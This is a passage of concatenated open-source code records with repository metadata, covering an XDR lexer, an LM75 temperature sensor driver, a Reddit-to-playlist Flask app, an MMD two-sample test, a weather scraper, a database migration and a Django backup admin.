end(cls, reader):\n c = reader.peek()\n if c is None:\n return True\n return not c.isalnum() and c != \"_\"\n\n\nclass XDRTokenPunctuation(XDRToken):\n @classmethod\n def start(cls, reader):\n c = reader.peek()\n return c in [\";\", \"=\", \"{\", \"}\", \",\", \"[\", \"]\", \"<\", \">\", \"*\", \"(\", \")\", \":\"]\n\n @classmethod\n def end(cls, reader):\n return True\n\n\nclass XDRTokenConstant(XDRToken):\n @classmethod\n def start(cls, reader):\n c1 = reader.peek()\n c2 = reader.peek(skip=1)\n return c1.isdecimal() or (c1 == \"-\" and c2 is not None and c2.isdecimal())\n\n @classmethod\n def end(cls, reader):\n c = reader.peek()\n return (\n not c.isdecimal()\n and not c == \".\"\n and not c.lower() in [\"x\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\n )\n\n\nclass XDRTokenCEscape(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.column == 0 and reader.peek() == \"%\"\n\n @classmethod\n def end(cls, reader):\n return reader.peek() == \"\\n\"\n\n\nclass XDRTokenSpace(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.peek().isspace()\n\n @classmethod\n def end(cls, reader):\n c = reader.peek()\n return c is None or not c.isspace()\n\n\nclass XDRLexer:\n def __init__(self, fp):\n self.reader = XDRReader(fp)\n self.lookahead = []\n\n def _token(self):\n tokenTypes = [\n XDRTokenComment,\n XDRTokenIdentifier,\n XDRTokenCEscape,\n XDRTokenPunctuation,\n XDRTokenConstant,\n XDRTokenSpace,\n ]\n while True:\n if self.reader.peek() is None:\n return None\n\n for tokenType in tokenTypes:\n if tokenType.start(self.reader):\n ret = tokenType.consume(self.reader)\n if type(ret) not in [XDRTokenSpace, XDRTokenComment]:\n return ret\n\n def next(self):\n if len(self.lookahead) > 0:\n token = self.lookahead[0]\n self.lookahead = self.lookahead[1:]\n return token\n return self._token()\n\n def peek(self):\n if len(self.lookahead) == 0:\n token = self._token()\n if token is None:\n return None\n self.lookahead.append(token)\n return self.lookahead[0]\n","repo_name":"libvirt/libvirt","sub_path":"scripts/rpcgen/rpcgen/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":1243,"dataset":"github-code","pt":"19"} +{"seq_id":"11332346279","text":"#Import Libraries\nimport cv2\nimport numpy as np\n\nimg = cv2.imread('assets/bug1.png',0)\nimg = cv2.resize(img,(400,400))\nimg = cv2.bitwise_not(img)\ncv2.imshow('Original',img)\n\n#define the kernal\nkernal = np.ones((3,3),np.uint8)\n\n#erosion of the image ie.removes pixels on object boundaries \nerosion = cv2.erode(img,kernal,iterations = 9)\ncv2.imshow('erosion method',erosion)\n\n#Dilation adds pixels to the boundaries of objects in an image\ndilation = cv2.dilate(img,kernal,iterations = 9)\ncv2.imshow('Dilation',dilation)\n\n\n\n\nopening = cv2.morphologyEx(img,cv2.MORPH_OPEN,kernal,iterations = 9)\ncv2.imshow('Opening',opening)\n\n#The closing operation dilates an image and then erodes the dilated image \nclosing = cv2.morphologyEx(img,cv2.MORPH_CLOSE,kernal,iterations = 9)\ncv2.imshow('Closing',closing)\n\n\n\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"Jem1D/DIP-codes","sub_path":"exp10_morph.py","file_name":"exp10_morph.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23948115333","text":"import logging\nfrom . import bus\n\nLM75_CHIP_ADDR = 0x48\nLM75_I2C_SPEED = 100000\nLM75_REGS = {\n 'TEMP' : 0x00,\n 'CONF' : 0x01,\n 'THYST' : 0x02,\n 'TOS' : 0x03,\n 'PRODID' : 0x07 # TI LM75A chips only?\n}\nLM75_REPORT_TIME = .8\n# Temperature can be sampled at any time but the read aborts\n# the current conversion. Conversion time is 300ms so make\n# sure not to read too often.\nLM75_MIN_REPORT_TIME = .5\n\nclass LM75:\n def __init__(self, config):\n self.printer = config.get_printer()\n self.name = config.get_name().split()[-1]\n self.reactor = self.printer.get_reactor()\n self.i2c = bus.MCU_I2C_from_config(config, LM75_CHIP_ADDR,\n LM75_I2C_SPEED)\n self.mcu = self.i2c.get_mcu()\n self.report_time = config.getfloat('lm75_report_time', LM75_REPORT_TIME,\n minval=LM75_MIN_REPORT_TIME)\n self.temp = self.min_temp = self.max_temp = 0.0\n self.sample_timer = self.reactor.register_timer(self._sample_lm75)\n self.printer.add_object(\"lm75 \" + self.name, self)\n self.printer.register_event_handler(\"klippy:connect\",\n self.handle_connect)\n\n def handle_connect(self):\n self._init_lm75()\n self.reactor.update_timer(self.sample_timer, self.reactor.NOW)\n\n def setup_minmax(self, min_temp, max_temp):\n self.min_temp = min_temp\n self.max_temp = max_temp\n\n def setup_callback(self, cb):\n self._callback = cb\n\n def get_report_time_delta(self):\n return self.report_time\n\n def degrees_from_sample(self, x):\n # The temp sample is encoded in the top 9 bits of a 16-bit\n # value. Resolution is 0.5 degrees C.\n return x[0] + (x[1] >> 7) * 0.5\n\n def _init_lm75(self):\n # Check and report the chip ID but ignore errors since many\n # chips don't have it\n try:\n prodid = self.read_register('PRODID', 1)[0]\n logging.info(\"lm75: Chip ID %#x\" % prodid)\n except:\n pass\n\n def _sample_lm75(self, eventtime):\n try:\n sample = self.read_register('TEMP', 2)\n self.temp = self.degrees_from_sample(sample)\n except Exception:\n logging.exception(\"lm75: Error reading data\")\n self.temp = 0.0\n return self.reactor.NEVER\n\n if self.temp < self.min_temp or self.temp > self.max_temp:\n self.printer.invoke_shutdown(\n \"LM75 temperature %0.1f outside range of %0.1f:%.01f\"\n % (self.temp, self.min_temp, self.max_temp))\n\n measured_time = self.reactor.monotonic()\n self._callback(self.mcu.estimated_print_time(measured_time), self.temp)\n return measured_time + self.report_time\n\n def read_register(self, reg_name, read_len):\n # read a single register\n regs = [LM75_REGS[reg_name]]\n params = self.i2c.i2c_read(regs, read_len)\n return bytearray(params['response'])\n\n def write_register(self, reg_name, data):\n if type(data) is not list:\n data = [data]\n reg = LM75_REGS[reg_name]\n data.insert(0, reg)\n self.i2c.i2c_write(data)\n\n def get_status(self, eventtime):\n return {\n 'temperature': round(self.temp, 2),\n }\n\n\ndef load_config(config):\n # Register sensor\n pheaters = config.get_printer().load_object(config, \"heaters\")\n pheaters.add_sensor_factory(\"LM75\", LM75)\n","repo_name":"Klipper3d/klipper","sub_path":"klippy/extras/lm75.py","file_name":"lm75.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":7817,"dataset":"github-code","pt":"19"} +{"seq_id":"19653990319","text":"from flask import Blueprint\nfrom flask import flash\nfrom flask import g\nfrom flask import redirect\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nfrom werkzeug.exceptions import abort\nimport praw\nfrom praw.models import MoreComments\nfrom google.cloud import language\nfrom google.cloud.language import enums\nfrom google.cloud.language import types\nfrom gmusicapi import Mobileclient\nfrom uuid import getnode as getmac\nfrom scrapper.google_config import g_music\nimport os\n\nimport re\n\nreddit_app_id = os.getenv(\"SCRAPPER_REDDIT_ID\")\nreddit_app_secret = os.getenv(\"SCRAPPER_REDDIT_SECRET\")\nreddit = praw.Reddit(user_agent=\"Comment Extraction\",\n client_id=reddit_app_id, client_secret=reddit_app_secret)\n\nclient = language.LanguageServiceClient()\n\nbp = Blueprint(\"reddit\", __name__)\n\n\n@bp.route(\"/\", methods=(\"GET\", \"POST\"))\ndef index():\n song_match_regexp = r\"^(.*)\\s(by|-)([A-Za-z\\t ]+)+\"\n \"\"\"Scrape a reddit post.\"\"\"\n if request.method == \"POST\":\n url = request.form[\"url\"]\n playlist = request.form[\"playlist\"]\n error = None\n \n\n if not url:\n error = \"URL is required.\"\n if not playlist:\n playlist = \"Songs from Reddit \" + url\n if error is not None:\n flash(error)\n else:\n print(\"Parsing the following URL: \" + url) \n \n song_ids = []\n submission = reddit.submission(url=url)\n songs = []\n submission.comment_sort = \"top\"\n submission.comments.replace_more(limit=1)\n exclude_words = [\"SONG\", \"COMMENT\", \"ICON\", \"COMMENTS\", \"SONGS\", \"ICONS\", \"ALBUM\", \"ALBUMS\"]\n print(\"Fetching top comments\")\n for top_level_comment in submission.comments:\n # We only want short-ish replies as we're looking for songs and not meta or chatter\n if len(top_level_comment.body) < 150: \n cleaned_comment = clean(top_level_comment.body)\n if re.match(song_match_regexp, cleaned_comment, re.IGNORECASE):\n song_match = re.match(song_match_regexp, cleaned_comment)\n song_to_search = song_match.group(1) + \" \" + song_match.group(2) + \" \" + song_match.group(3)\n songs.append(song_to_search)\n else:\n print(\"Extracting entities\")\n document = types.Document(\n content=cleaned_comment,\n type=enums.Document.Type.PLAIN_TEXT) \n # Extract entities of the comments\n entities = client.analyze_entities(document=document).entities\n # If the entity is either work of art or a person, append it to the list.\n song_and_artist = []\n for entity in entities: \n # entity type number 5 is WORK_OF_ART \n if (entity.type == 5 and entity.name.upper() not in exclude_words) or entity.type == 1:\n song_and_artist.append(entity.name)\n if len(song_and_artist) > 0:\n songs.append(\" - \".join(song_and_artist))\n\n print(\"Matching songs with Google play music\")\n for song in songs: \n search_result = g_music.search(song, max_results=20) \n print(\"Searching for \" + song)\n if(\"song_hits\" in search_result):\n if len(search_result[\"song_hits\"]) > 0:\n song_id = search_result[\"song_hits\"][0][\"track\"][\"storeId\"]; \n song_ids.append(song_id) \n \n print(\"Creating playist: \" + playlist)\n playist_id = g_music.create_playlist(playlist, \"\", True)\n print(\"adding songs to playlist\" + playist_id )\n g_music.add_songs_to_playlist(playist_id, song_ids) \n return render_template(\"reddit/index.html\", posts=songs, google_auth = g_music.is_authenticated())\n\n return render_template(\"reddit/index.html\", google_auth = g_music.is_authenticated())\n\ndef clean(comment):\n comment = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', comment, flags=re.MULTILINE)\n comment = comment.replace(\"[\", \"\").replace(\"(\", \"\").replace(\"]\", \"\").replace(\")\", \"\")\n return comment\n\n","repo_name":"jeremy-albuixech/scrapper","sub_path":"reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11857684544","text":"import glob\nimport numpy\nimport CNNTransform\n\nresnet = CNNTransform.resnet18()\n\ndef dist_prob(a, x):\n d = numpy.exp(((a - x)**2).sum(1))\n return d / d.sum()\n\nclass DeepMatch():\n def __init__(self, vector_dir=\"vectors\"):\n files = glob.glob(vector_dir + \"/*.csv\")\n labels = []\n V = []\n\n for f in files:\n print(\"Loading: \", f)\n labels.append(f.split(\"/\")[-1].split(\".\")[0])\n V.append(numpy.loadtxt(f, delimiter=\",\"))\n\n self.V = numpy.vstack(V)\n self.labels = numpy.hstack(labels)\n\n def predict(self, X):\n T = resnet.transform(X)\n\n # similarity\n D = [dist_prob(self.V, x).ravel() for x in T.detach().numpy()]\n\n p = []\n for d in D:\n idx = d.argsort()[:5]\n p.append(dict(zip(self.labels[idx], d[idx].tolist())))\n print(p)\n return p\n\n\nif __name__ == '__main__':\n from optparse import OptionParser\n\n parser = OptionParser()\n parser.add_option(\"-i\", \"--image\", dest=\"image\",\n help=\"Path to image\")\n","repo_name":"radolalaina/deeplearning","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38345208009","text":"# File: Untrained CNN\r\n# Description: This program allows the user to train and save a new CNN.\r\n# Institution: University of Texas at Austin, Department of Biomedical Engineering\r\n# Developer: Shao-Po (Shawn) Huang\r\n# Team Members: Bryce Carr, Ajay Gadwal, Ethan Muyskens, Christian Schonhoeft\r\n\r\n# Date Last Modified: 05/11/20\r\n\r\n# This program uses keras and joblib.\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dropout\r\nfrom keras.layers.convolutional import Conv1D\r\nfrom keras.layers.convolutional import MaxPooling1D\r\nfrom keras.utils import to_categorical\r\nimport joblib\r\n\r\n# Helpful resource for building convolutional neural network:\r\n# https://machinelearningmastery.com/cnn-models-for-human-activity-recognition-time-series-classification/\r\n\r\n# Documentation for keras:\r\n# https://keras.io/\r\n\r\n# Source for CNN design:\r\n# Yildirim O, Baloglu UB, Acharya UR. A Deep Learning Model for Automated Sleep Stages Classification Using PSG Signals.\r\n# Int J Environ Res Public Health. 2019;16(4):599. Published 2019 Feb 19. doi:10.3390/ijerph16040599\r\n\r\n# Build the CNN\r\nn_timesteps, n_features, n_outputs = trainX.shape[1], trainX.shape[2], trainy.shape[1]\r\nmodel = Sequential()\r\nmodel.add(Conv1D(filters=64, kernel_size=5, strides=3, activation='relu', input_shape=(n_timesteps,n_features)))\r\nmodel.add(Conv1D(filters=128, kernel_size=5, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Conv1D(filters=128, kernel_size=13, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=256, kernel_size=7, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=256, kernel_size=7, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=64, kernel_size=4, strides=1, activation='relu')) \r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=32, kernel_size=3, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=64, kernel_size=6, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=8, kernel_size=5, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=8, kernel_size=2, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(64, activation='relu'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(n_outputs, activation='softmax'))\r\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n\r\n# Fit the CNN\r\nmodel.fit(trainX, trainy, epochs=100, verbose=2, batch_size=32)\r\n\r\n# Save trained CNN by providing destination\r\njoblib.dump(model,PATH_CNN)\r\n","repo_name":"shawnh871/Sleep_Stage_Classification","sub_path":"Untrained_CNN.py","file_name":"Untrained_CNN.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23089104183","text":"\"\"\"add category, message_type and message table\n\nRevision ID: 27ce67ba5f4d\nRevises: 0dbc42ae52bd\nCreate Date: 2020-08-04 20:40:09.626568\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '27ce67ba5f4d'\ndown_revision = '0dbc42ae52bd'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('categories',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('c_name', sa.String(length=50), nullable=False),\n sa.Column('c_descripton', sa.String(length=100), nullable=True),\n sa.Column('c_thumbnail', sa.String(length=50), nullable=True),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('message_types',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('t_name', sa.String(length=50), nullable=False),\n sa.Column('t_description', sa.String(length=100), nullable=True),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('m_title', sa.String(length=100), nullable=True),\n sa.Column('m_description', sa.String(length=200), nullable=True),\n sa.Column('type_id', sa.Integer(), nullable=False),\n sa.Column('m_thumbnail', sa.String(length=100), nullable=True),\n sa.Column('m_link', sa.String(length=200), nullable=True),\n sa.Column('m_duration', sa.String(length=50), nullable=True),\n sa.Column('m_broadcast', sa.Boolean(), nullable=False),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.ForeignKeyConstraint(['type_id'], ['message_types.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages_categories',\n sa.Column('message_id', sa.Integer(), nullable=False),\n sa.Column('category_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['category_id'], ['categories.id'], ),\n sa.ForeignKeyConstraint(['message_id'], ['messages.id'], ),\n sa.PrimaryKeyConstraint('message_id', 'category_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('messages_categories')\n op.drop_table('messages')\n op.drop_table('message_types')\n op.drop_table('categories')\n # ### end Alembic commands ###\n","repo_name":"pat64j/dante-backend","sub_path":"migrations/versions/27ce67ba5f4d_add_category_message_type_and_message_.py","file_name":"27ce67ba5f4d_add_category_message_type_and_message_.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35851290015","text":"\"\"\"\nThe methods here are taken from Liu et al\nhttps://github.com/fengliu90/DK-for-TST/blob/master/Baselines_Blob.py\n\"\"\"\nfrom sklearn.utils import check_random_state\nfrom argparse import Namespace\nimport argparse\nimport os\nimport numpy as np\nimport torchvision.transforms as transforms\nimport torchvision.transforms.functional as TF\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch\nimport pickle\nfrom tqdm.auto import tqdm\nfrom utils_HD import MatConvert, MMDu, TST_MMD_u\nfrom mmdvar import IncomMMDVar, ComMMDVar, h1_mean_var_gram\n\n# Setup seeds\nnp.random.seed(1102)\ntorch.manual_seed(1102)\ntorch.cuda.manual_seed(1102)\ntorch.backends.cudnn.deterministic = True\nis_cuda = True\n\ndtype = torch.float\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else 'cpu')\ncuda = True if torch.cuda.is_available() else False\n\n\ndef deep_mmd_not_image(sample_p, sample_q, use_1sample_U, complete, n_epochs=1000):\n assert sample_p.shape[1] == sample_q.shape[1]\n sample_p = np.array(sample_p, dtype='float32')\n sample_q = np.array(sample_q, dtype='float32')\n \n # Setup for all experiments\n alpha = 0.05 # test threshold\n x_in = sample_p.shape[1] # number of neurons in the input layer, i.e., dimension of data\n H = 50 # number of neurons in the hidden layer\n x_out = 50 # number of neurons in the output layer\n learning_rate = 0.0005 # learning rate for MMD-D on Blob\n N_epoch = n_epochs # number of training epochs\n\n # prepare datasets\n sample_p = torch.from_numpy(sample_p)\n sample_q = torch.from_numpy(sample_q)\n \n # split data 50/50\n x_train, x_test = sample_p[:len(sample_p)//2], sample_p[len(sample_p)//2:]\n y_train, y_test = sample_q[:len(sample_q) // 2], sample_q[len(sample_q) // 2:]\n\n # Initialize parameters\n model_u = ModelLatentF(x_in, H, x_out)\n if cuda:\n model_u.cuda()\n epsilonOPT = MatConvert(np.random.rand(1) * (10 ** (-10)), device, dtype)\n epsilonOPT.requires_grad = True\n sigmaOPT = MatConvert(np.sqrt(np.random.rand(1) * 0.3), device, dtype)\n sigmaOPT.requires_grad = True\n sigma0OPT = MatConvert(np.sqrt(np.random.rand(1) * 0.002), device, dtype)\n sigma0OPT.requires_grad = True\n\n # Setup optimizer for training deep kernel\n optimizer_u = torch.optim.Adam(list(model_u.parameters())+[epsilonOPT]+[sigmaOPT]+[sigma0OPT], lr=learning_rate) #\n\n # Train deep kernel to maximize test power\n S = torch.cat([x_train.cpu(), y_train.cpu()], 0).to(device)\n # S = MatConvert(S, device, dtype)\n N1 = len(x_train)\n np.random.seed(seed=1102)\n torch.manual_seed(1102)\n torch.cuda.manual_seed(1102)\n for t in tqdm(range(N_epoch)):\n # Compute epsilon, sigma and sigma_0\n ep = torch.exp(epsilonOPT)/(1+torch.exp(epsilonOPT))\n sigma = sigmaOPT ** 2\n sigma0_u = sigma0OPT ** 2\n # Compute output of the deep network\n modelu_output = model_u(S)\n # Compute J (STAT_u)\n TEMP = MMDu(modelu_output, N1, S, sigma, sigma0_u, ep, use_1sample_U=use_1sample_U, complete=complete)\n mmd_value_temp = -1 * TEMP[0]\n mmd_std_temp = torch.sqrt(TEMP[1]+10**(-6))\n STAT_u = torch.div(mmd_value_temp, mmd_std_temp)\n # Initialize optimizer and Compute gradient\n optimizer_u.zero_grad()\n STAT_u.backward(retain_graph=True)\n # Update weights using gradient descent\n optimizer_u.step()\n\n # Compute test power of deep kernel based MMD\n S = torch.cat([x_test.cpu(), y_test.cpu()], 0).to(device)\n # S = MatConvert(S, device, dtype)\n N1 = len(x_test)\n N_per = 500\n alpha = 0.05\n # MMD-D\n dec, pvalue, _ = TST_MMD_u(model_u(S), N_per, N1, S, sigma, sigma0_u, ep, alpha, device, dtype, use_1sample_U=use_1sample_U, complete=complete)\n return dec\n\n\nclass ModelLatentF(torch.nn.Module):\n \"\"\"Latent space for both domains.\"\"\"\n def __init__(self, x_in, H, x_out):\n \"\"\"Init latent features.\"\"\"\n super(ModelLatentF, self).__init__()\n self.restored = False\n self.latent = torch.nn.Sequential(\n torch.nn.Linear(x_in, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, x_out, bias=True),\n )\n def forward(self, input):\n \"\"\"Forward the LeNet.\"\"\"\n fealant = self.latent(input)\n return fealant","repo_name":"sumahn/c2st","sub_path":"MMD/ts_tests/deep_mmd_not_image.py","file_name":"deep_mmd_not_image.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45720450858","text":"import requests\nimport urllib.request\nimport time\nimport csv\nfrom bs4 import BeautifulSoup\nimport sched, time\nfrom datetime import datetime\nfrom yoo_telegram import Notifier\nimport pygsheets\nfrom config import BOT_TOKEN, TELEGRAM_USER\n\n\nclient = Notifier(BOT_TOKEN)\ngc = pygsheets.authorize(\n service_file=\"keys/bratislava-weather-trends-b9b47037fa19.json\"\n)\nSECONDS = 60 * 60\n\n\ndef getData(sc):\n try:\n sh = gc.open(\"weather-data\")\n wks = sh.sheet1\n\n url = \"http://www.shmu.sk/sk/?page=59\"\n response = requests.get(url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n timeNow = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n for row in soup.findAll(\"table\")[0].find_all(\"tr\"):\n columns = row.find_all(\"td\")\n if columns[0].text not in (\n \"Bratislava - Mlynská Dolina\",\n \"Bratislava Koliba\",\n ):\n continue\n else:\n station = columns[0].text.strip()\n temperature = columns[1].text.strip().split(\" \")[0]\n wind_dir = columns[2].text.strip()\n wind_speed = columns[3].text.strip().split(\" \")[0]\n wind_gusts = columns[4].text.strip()\n pressure = columns[5].text.strip().split(\" \")[0]\n clouds = columns[6].text.strip()\n weather = columns[7].text.strip()\n\n wks.insert_rows(\n 1,\n number=1,\n values=[\n timeNow,\n station,\n temperature,\n wind_dir,\n wind_speed,\n wind_gusts,\n pressure,\n clouds,\n weather,\n ],\n inherit=False,\n )\n sc.enter(SECONDS, 1, getData, (sc,))\n except Exception as e:\n timeErr = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n e_msg = f\"{timeErr} - Bratislava weather - {str(e)}\"\n client.sendMessage(TELEGRAM_USER, e_msg)\n sc.enter(SECONDS, 1, getData, (sc,))\n\n\ndef main():\n s = sched.scheduler(time.time, time.sleep)\n try:\n s.enter(SECONDS, 1, getData, (s,))\n s.run()\n except Exception as e:\n timeErr = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n e_msg = f\"{timeErr} - Bratislava weather - {str(e)}\"\n client.sendMessage(TELEGRAM_USER, e_msg)\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"williambrach/Bratislava-weather-trends","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71807499243","text":"class BasketballPlayer():\n def __init__(self, team, first_name, last_name, height_cm, weight_kg, points, rebounds, assists, triple_doubles):\n self.team = team\n self.first_name = first_name\n self.last_name = last_name\n self.height_cm = height_cm\n self.weight_cm = weight_kg\n self.points = points\n self.rebounds = rebounds\n self.assists = assists\n self.triple_doubles = triple_doubles\n\n\nprint(\"Build your own NBA team with adding your own favorite players!\")\n\nnew_player = BasketballPlayer(\n team=input(\"Enter player team: \"),\n first_name=input(\"First name: \"),\n last_name=input(\"Last name: \"),\n height_cm=input(\"Height in centimeters: \"),\n weight_kg=input(\"Weight in kilograms: \"),\n points=input(\"Points: \"),\n rebounds=input(\"Rebounds: \"),\n assists=input(\"Assists: \"),\n triple_doubles=input(\"Triple doubles: \")\n)\n\nwith open(\"player.txt\", \"w\") as player_file:\n player_file.write(str(new_player.__dict__))\n\nprint(\"Player added!\")","repo_name":"jaxtothemax/PythonHomework_13","sub_path":"Add_Player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18856698610","text":"stack = []\n\ndef isEmpty():\n if len(stack) == 0:\n return True\n else:\n return False\n\ndef push(n):\n stack.append(n)\n\ndef pop():\n if isEmpty():\n print(\"Stack is empty.\")\n else:\n stack.pop()\n\ndef display():\n if isEmpty():\n print (\"Stack is empty\")\n else:\n print (stack)\n\nwhile True:\n choice = int (input(\"Make a choice: \"))\n if choice == 1:\n num = int(input(\"Enter an element to be input in the stack: \"))\n push(num)\n elif choice == 2:\n pop()\n elif choice == 3:\n display()","repo_name":"Advaitmenon1106/backup","sub_path":"Py/Data Structures in Python/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14476275797","text":"# -*- coding: utf-8 -*-\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.template.response import TemplateResponse\nfrom django.core.urlresolvers import reverse\nfrom django.conf.urls import patterns, url\nfrom django.shortcuts import redirect\nfrom django.contrib import admin\nfrom dbsnapshot import models\n\n\nclass ServerAdmin(admin.ModelAdmin):\n list_display = (\n 'host', 'port', 'status', 'remote_status', 'remote_list_num',\n 'days', 'per_day', 'created', 'updated', 'actions_column', 'id',)\n search_fields = ('host',)\n list_filter = ('status', 'created', 'updated',)\n\n def __init__(self, *args, **kwargs):\n super(ServerAdmin, self).__init__(*args, **kwargs)\n self._col_inst = None\n\n def _get_link(self, title, view_name):\n return '[%s] ' % (\n reverse('admin:%s' % view_name, args=(self._col_inst.pk,),\n current_app=self.admin_site.name),\n unicode(title)\n )\n\n def actions_column(self, instance, actions=''):\n self._col_inst = instance\n actions += self._get_link(_('backup'), 'backup_view')\n actions += self._get_link(_('clean'), 'clean_view')\n actions += self._get_link(_('list of backups'), 'backup_list')\n return actions\n\n actions_column.short_description = _('Actions')\n actions_column.allow_tags = True\n\n def _server_view(self, request, pk, template, extra_context=None):\n context = {\n 'server': models.Server.objects.get(pk=pk),\n 'app_label': models.Server._meta.app_label,\n 'verbose_name': unicode(models.Server._meta.verbose_name),\n }\n if extra_context is not None:\n context.update(extra_context)\n return TemplateResponse(\n request, 'dbsnapshot/admin/%s.html' % template, context,\n current_app=self.admin_site.name)\n\n def backup_view(self, request, pk):\n return self._server_view(request, pk, 'backup_view')\n\n def clean_view(self, request, pk):\n return self._server_view(request, pk, 'clean_view')\n\n def backup_list_view(self, request, pk):\n return self._server_view(request, pk, 'backup_list')\n\n def backup_delete_view(self, request, pk, filename):\n models.Server.objects.get(pk=pk).remote_delete(filename)\n return redirect(\n reverse(\n 'admin:backup_list', args=(pk,),\n current_app=self.admin_site.name\n )\n )\n\n def get_urls(self):\n urls = super(ServerAdmin, self).get_urls()\n\n admin_urls = patterns(\n '',\n url(\n r'^backup/(\\d+)/$',\n self.admin_site.admin_view(self.backup_view),\n name='backup_view'\n ),\n url(\n r'^backup/clean/(\\d+)/$',\n self.admin_site.admin_view(self.clean_view),\n name='clean_view'\n ),\n url(\n r'^backup/list/(\\d+)/$',\n self.admin_site.admin_view(self.backup_list_view),\n name='backup_list'\n ),\n url(\n r'^backup/delete/(\\d+)/(.*?)/$',\n self.admin_site.admin_view(self.backup_delete_view),\n name='backup_delete'\n ),\n )\n return admin_urls + urls\n\n\nclass BackupLogAdmin(admin.ModelAdmin):\n list_display = (\n 'server', 'method', 'start', 'end', 'elapsed',\n 'success', 'date', 'id',)\n date_hierarchy = 'date'\n search_fields = ('server__host',)\n list_filter = ('method', 'success', 'date',)\n\n def __init__(self, model, admin_site):\n super(BackupLogAdmin, self).__init__(model, admin_site)\n\n self.readonly_fields = [field.name for field in model._meta.fields]\n self.readonly_model = model\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n def has_change_permission(self, request, obj=None):\n return request.method != 'POST'\n\n\nadmin.site.register(models.Server, ServerAdmin)\nadmin.site.register(models.Log, 